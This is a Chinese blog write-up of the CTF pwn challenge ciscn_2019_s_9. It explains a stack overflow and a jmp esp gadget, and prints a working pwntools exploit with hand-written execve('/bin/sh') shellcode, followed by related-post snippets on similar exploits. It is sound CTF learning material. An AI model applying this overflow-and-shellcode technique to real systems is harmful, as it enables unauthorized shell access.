ciscn_2019_s_9

最新推荐文章于 2023-06-12 16:13:30 发布
最新推荐文章于 2023-06-12 16:13:30 发布
阅读量803 收藏 1
点赞数
分类专栏: CTF PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/K1ose/article/details/115986452
版权

下载附件,file一下,是32bit程序;
checksec一下;
在这里插入图片描述

基本没保护措施;
IDA里分析一波;
main()跳到pwn()
在这里插入图片描述
看看pwn()的内容;
在这里插入图片描述
看到fgets立马想到栈溢出;
又注意到有一个hint()函数;
在这里插入图片描述
其内容如下:
在这里插入图片描述

这里直接跳到了$esp$esp是在堆栈上的;
既然有栈溢出,栈可执行,又有一个跳转到$esp的函数,思路就很清晰了;
我们先利用栈溢出,覆盖pwn()函数的返回地址为jmp esp的地址,然后我们再使得$esp指向shellcode所在的地址,完美!

但是因为shellcode太长了,无法将返回地址赋值为jmp esp的地址;
在这里插入图片描述
那还是自己构造个系统调用来弹shell吧;

# coding=utf-8
from pwn import *

p = process("./ciscn_s_9")

ret_addr = 0x08048554 #jmp esp
shellcode ='''
xor eax,eax
xor edx,edx
push edx
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
xor ecx,ecx
mov al,0xb
int 0x80                
'''
shellcode=asm(shellcode)
payload = shellcode.ljust(0x24,'a') + p32(ret_addr) + asm("sub esp,40;call esp")
print(len(payload))

#gdb.attach(p)
p.sendline(payload)
p.interactive()

由于$esp的位置被挤到了距离shellcode开始位置40bytes后的地方,因此我们手动减掉40bytes,再主动调用;

在这里插入图片描述

这样$esp就能指向我们的shellcode,从而运行shellcode,最终弹shell;
在这里插入图片描述

连上buuoj,拿flag;

在这里插入图片描述

K1ose
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【pwn】ciscn_2019_s_3
Nothing
12-14 4499
这题是全国大学生信息安全竞赛的一道线下半决赛题目,好像是华南赛区? 例行检查。 分析程序。 vul函数 两个系统调用,一个是sys_read,一个是sys_write,往栈上写数据(0x400),从栈上读数据(0x30),存在栈溢出。 还有一个gadget函数。 有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值,看看这两个是什么系统调用...
[BUUCTF]PWN——ciscn_2019_s_9(汇编代码写shellcode)
mcmuyanga的博客
01-28 1515
ciscn_2019_s_9 附件 步骤 例行检查,32位程序,没用开启任何保护 本地试运行看一下程序大概的情况 32位ida载入,第10行的fgets,能够溢出0x32-0x20-0x4个字节 由于没用nx保护,首先想到的就是往s里写入shellcode,然后跳转到s执行shellcode,s在栈上,ida里有一个函数,为我们提供了跳转到栈上的指令jmp esp 现在就一个问题,s大小只有0x20,用下面的shellcode不懂能不能完全写入 context(log_level = 'debu
[buuctf]ciscn_2019_s_9
逆向萌新的博客
07-15 997
[buuctf]ciscn_2019_s_9
[BUUCTF] ciscn_2019_s_9
zyxx_wjc的博客
07-10 233
ciscn_2019_s_9
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
ciscn_2021_game
06-23
2021年国赛的pwn题,虚拟机类型的题目,分析起来比较有难度。
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
ciscn_2021_lonelywolf.zip
05-17
【标题解析】:“ciscn_2021_lonelywolf.zip”这个文件名暗示了这是一个与2021年全国大学生信息安全竞赛相关的资源,其中“ciscn”可能代表了“Chinese Internet Security Contest”,而“lonelywolf”可能是该竞赛...
[BUUCTF]PWN——ciscn_2019_s_9
BangSen1的博客
04-26 514
ciscn_2019_s_9 参考 例行检查 ,32位,未开启任何保护 运行一下。 32位ida载入,,第10行的fgets,能够溢出0x32-0x20-0x4个字节 没用nx保护,首先想到的就是往s里写入shellcode,然后跳转到s执行shellcode 生成的shellcode的长度过长,参数 s0x20(32) 写不下。 shellcode =''' xor eax,eax #eax置0 xor edx,edx #edx置0 push edx #将0入栈,标
BUUCTF PWN ciscn_2019_s_9
Rt1Text的博客
04-22 247
1.checksec+运行 32位/没有保护 2.32IDA进行中 1.hint函数 提示函数,很有帮助,解题关键点 直接跳到esp栈顶指针 2.pwn函数 明显的fgets()函数溢出 跟进s看看偏移 offset = 0x20+4 向s里写入shellcode 注意一点: 如果直接用pwntools生成的shellcode,会很长,s里写不下 所以这就需要我们优化shellcode的长度 shellcode =''' xor eax,eax ..
ciscn_2019_s_9详解
勿山几已
06-12 309
详解pwn入门题ciscn_2019_s_9
从BUUCTF之“ciscn_2019_s_9”见32位shellcode的简单写法,以及其中的难解之处
Probeginner的博客
12-09 249
32位简单shellcode
ciscn_2019_s_3
m0_48127441的博客
04-07 166
pwn题目主要是为了获得flag文件 一般使用 syscall(exec) 获得shell 或者使用open + read 获得文件内容 syscall(rax= 0x3B, rdi = '/bin/sh', rsi = 0x0, rdx = 0x0) //execve 函数调用syscall system函数调用execve函数 因为封装过,调用参数有所变化,保护机制也有所区别 该题能栈溢出,但是不知道栈地址 发现正常输出(输入小于0x10的数据时),会讲rsi地...
BUUCTF pwn ciscn_2019_s_3(SROP)
菜的只能随便写写博客
02-13 1548
0x01 文件分析   0x02 运行  有一个回显,并且还有多余的字符显示,接着看代码分析一下。   0x03 IDA源码  由后面的函数可以看出,这个程序使用的系统调用,并且vuln里面存在栈溢出。  在程序之中的gadgets存在着两个为rax赋值的gadget,15的系统号是rt_sigreturn,3b的系统调用是execve,利用这两个可以执行系统调用得到shell。  ex...
21 07 28学习总结
eeeeeight的博客
07-29 163
21.07.28学习总结 Column: July 28, 2021 Tags: learning experience 11:00-12:00: buu刷题: ciscn_2019_final_3我写的不好, 写成要爆破的了 14:25-16:30: :buu刷题: ciscn_2019_es_7: 和ciscn_2019_s_3一模一样 ciscn_2019_s_9: 写一段汇编就好了 picoctf_2018_shellcode: ret2shellcode, 我傻逼了 actf_2019_babys
BUUCTF-PWN刷题记录-13(静态编译+去除调试符号)
weixin_44145820的博客
04-27 1328
目录[中关村2019]one_string(unlink) [中关村2019]one_string(unlink) 看这个保护,我以为很简单,然而··· 这题去除了所有符号,并且是静态编译,所以第一步就是把主要函数找出来,如下 在edit函数中,程序会重新计算content的长度,这个时候如果利用了chunk复用,下一个chunk的size也会被计算进长度,这样下次编辑的时候就能覆盖si...
ciscn_2019_c_1
最新发布
09-12
根据您提供的引用内容和,题目"ciscn_2019_c_1"是一个涉及到fastbin堆漏洞利用的题目。fastbin是一个堆区的数据结构,用于存储小于等于64字节的空闲块。这个题目的漏洞利用难度不大,适合初学者练习。 根据的代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值